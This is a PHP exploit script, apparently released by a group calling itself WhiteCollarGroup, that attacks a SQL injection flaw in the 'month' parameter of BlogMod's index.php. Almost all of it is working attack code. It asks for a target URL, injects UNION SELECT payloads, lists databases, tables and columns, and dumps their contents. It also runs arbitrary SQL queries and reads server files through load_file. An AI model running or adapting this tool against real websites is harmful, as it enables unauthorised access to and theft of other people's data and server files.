How does this exploit works? It exploits one of the several SQL Injections in the system. Specifiedly, in the file "index.php", parr "month". Usage: php filename.php */ function puts($str) { echo $str."\n"; } function gets() { return trim(fgets(STDIN)); } function hex($string){ $hex=''; // PHP 'Dim' =] for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$hex; } $token = uniqid(); $token_hex = hex($token); puts("BlogMod <= X SQL Injection Exploit"); puts("By WhiteCollarGroup"); puts("[?] Enter website URL (e. g.: http://www.target.com/blogmod/):"); $target = gets(); puts("[*] Checking..."); if(!@file_get_contents($target)) die("[!] Access error: check domain and path."); if(substr($target, (strlen($target)-1))!="/") $target .= "/"; function runquery($query) { global $target,$token,$token_hex; $query = preg_replace("/;$/", null, $query); $query = urlencode($query); $rodar = $target . "index.php?year=2012&month=-0%20union%20all%20select%201,2,concat%28$token_hex,%28$query%29,$token_hex%29,4,5,6--%20"; $get = file_get_contents($rodar); $matches = array(); preg_match_all("/$token(.*)$token/", $get, $matches); if(isset($matches[1][0])) return $matches[1][0]; else return false; } if(runquery("SELECT $token_hex")!=$token) { // error exit; } function main($msg=null) { global $token,$token_hex; echo "\n".$msg."\n"; puts("[>] MAIN MENU"); puts("[1] Browse MySQL"); puts("[2] Run SQL Query"); puts("[3] Read file"); puts("[4] About"); puts("[0] Exit"); $resp = gets(); if($resp=="0") exit; elseif($resp=="1") { // pega dbs $i = 0; puts("[.] Getting databases:"); while(true) { $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1"); if($pega) puts(" - ".$pega); else break; $i++; } puts("[!] Current database: ".runquery("SELECT database()")); puts("[?] Enter database name for select:"); $own = array(); $own['db'] = gets(); $own['dbh'] = hex($own['db']); // pega tables da db $i = 0; puts("[.] Getting tables from $own[db]:"); while(true) { $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1"); if($pega) puts(" - ".$pega); else break; $i++; } puts("[?] Enter table name for select:"); $own['tb'] = gets(); $own['tbh'] = hex($own['tb']); // pega colunas da table $i = 0; puts("[.] Getting columns from $own[db].$own[tb]:"); while(true) { $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1"); if($pega) puts(" - ".$pega); else break; $i++; } puts("[?] Enter columns name, separated by commas (\",\") for select:"); $own['cl'] = explode(",", gets()); // pega dados das colunas foreach($own['cl'] as $coluna) { $i = 0; puts("[=] Column: $coluna"); while(true) { $pega = runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1"); if($pega) { puts(" - $pega"); $i++; } else break; } echo "\n[ ] -+-\n"; } main(); } elseif($resp=="2") { puts("[~] RUN SQL QUERY"); puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat()."); puts("[?] Query (enter for exit): "); $query = gets(); if(!$query) main(); else main(runquery($query."\n")); } elseif($resp=="3") { puts("[?] File path (may not have priv):"); $file = hex(gets()); $le = runquery("SELECT load_file($file) AS wc"); if($le) main($le); else main("File not found, empty or no priv!"); } elseif($resp=="4") { puts("Coded by WhiteCollarGroup"); puts("www.wcgroup.host56.com"); puts("whitecollar_group@hotmail.com"); puts("twitter.com/WCollarGroup"); puts("facebook.com/WCollarGroup"); puts("wcollargroup.blogspot.com"); main(); } else main("[!] Wrong choice."); } main();